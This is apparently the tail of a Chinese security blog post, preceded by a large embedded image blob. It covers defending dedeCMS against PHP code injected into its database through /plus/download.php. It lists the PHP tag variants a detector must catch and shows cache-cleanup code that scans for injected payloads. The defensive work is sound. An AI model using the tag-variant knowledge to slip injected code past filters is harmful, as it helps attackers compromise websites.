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" alt="" />

需要特别注意的是,对于dedecms数据库后门的这个攻击向量场景来说,防御代码需要考虑以下几个方面

. PHP的起止标签具有很强的灵活性

    ) <?php ... ?>

    ) <? ... ?>

    ) <script language="php">...</script>

    ) <?=expression ... ?>

    ) <% ... %>

    ) <%=$variable %>

. PHP允许半开的标签,即当PHP代码和HTML代码混编的时候,处于文件最末尾的PHP代码不需要闭合标签即可正确执行

0x4: 脏数据的清理

$cacheFile = DEDEDATA.'/cache/mytag-'.$aid.'.htm';

/* clear diety data */

if(file_exists($cacheFile))

{

    $tmpcheck = file_get_contents($cacheFile);

    find_tag_payload($tmpcheck, $aid);

}

/* */

if( isset($nocache) || !file_exists($cacheFile) || time() - filemtime($cacheFile) > $cfg_puccache_time )

{

ad_js.php的思路类似

6. 攻防思考

暂无

Copyright (c) 2014 LittleHann All rights reserved

dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injecting PHP Code By /plus/download.php Into DB && /include/dedesql.class.php的更多相关文章

  1. DEDECMS数据库执行原理、CMS代码层SQL注入防御思路

    我们在上一篇文章中学习了DEDECMS的模板标签.模板解析原理,以及通过对模板核心类的Hook Patch来对模板的解析流量的攻击模式检测,达到修复模板类代码执行漏洞的目的 http://www.cn ...

  2. dedeCMS /data/mysql_error_trace.php DB error raised PHP Code Injection Via /include/dedesql.class.php Log FIle Without Access Validation

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 dedecms采用面向对象封装的方式实现了功能操作的模块集中化,例如对于数据库管理 ...

  3. DEDECMS之六 网站地图、RSS地图

    在用织梦CMS做网站的都知道,在它的robots.txt是屏蔽掉了data目录的,可是,不巧dedecms默认的网站地图是在data下的,为了让蜘蛛更好的爬行,有必要将dedecms生成的网站地图放在 ...

  4. 通用方法解决dedecms导航调用二级、三级栏目菜单

    博客之前做网站的时候经常会遇到二级菜单.三级菜单.了解dede的人都知道从5.5版本开始都有二级菜单的调用方法了,网上也有不少的教程文章.不过这个调用需要修改dede源码的二级菜单样式.个人感觉不是很 ...

  5. dedecms /plus/feedback_ajax.php、/templets/feedback_main.htm、/templets/feedback_edit.htm XSS && SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 通过该漏洞可以注入恶意代码到评论标题里,网站管理员在后台管理用户评论时触 ...

  6. DEDECMS:解决BMP、jpeg图片或MP4视频无法上传和在后台无法显示

    一.BMP图片无法上传解决方法: 1.修改配置文件: 在include-->dialog的文件夹下, select_images_post.php--> 把 $sparr = Array( ...

  7. dedecms的if标签、foreach标签

    1.if标签 (1)下拉列表 <select name="prize_type[]" class="type J-prize-type" id=" ...

  8. dedecms /member/buy_action.php Weak Password Vulnerability Algorithm Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . 漏洞由mchStrCode函数弱算法(异或算法: 得其中2知余下1) ...

  9. PostgreSQL Reading Ad Writing Files、Execution System Instructions Vul

    catalog . postgresql简介 . 文件读取/写入 . 命令执行 . 影响范围 . 恶意代码分析 . 缓解方案 1. postgresql简介 PostgreSQL 是一个自由的对象-关 ...

随机推荐

  1. 代码整洁--使用CodeMaid自动程序排版

    在项目开发的过程中,如果只是验证命名规则.而没有统一程序排版,项目中很容易就会出现类似下列范例的程序代码产出.这样的产出,虽然能够正常地提供项目功能.并且符合微软的命名规则,但是因为程序排版凌乱的问题 ...

  2. mac 10.9.4下配置apache

    mac 10.9.x已经自带了apache,可按如下步骤开启: 1.启动 sudo apachectl start 启动后,访问 http://localhost/ 应该能看到"It wor ...

  3. OpenCV中的神器Image Watch

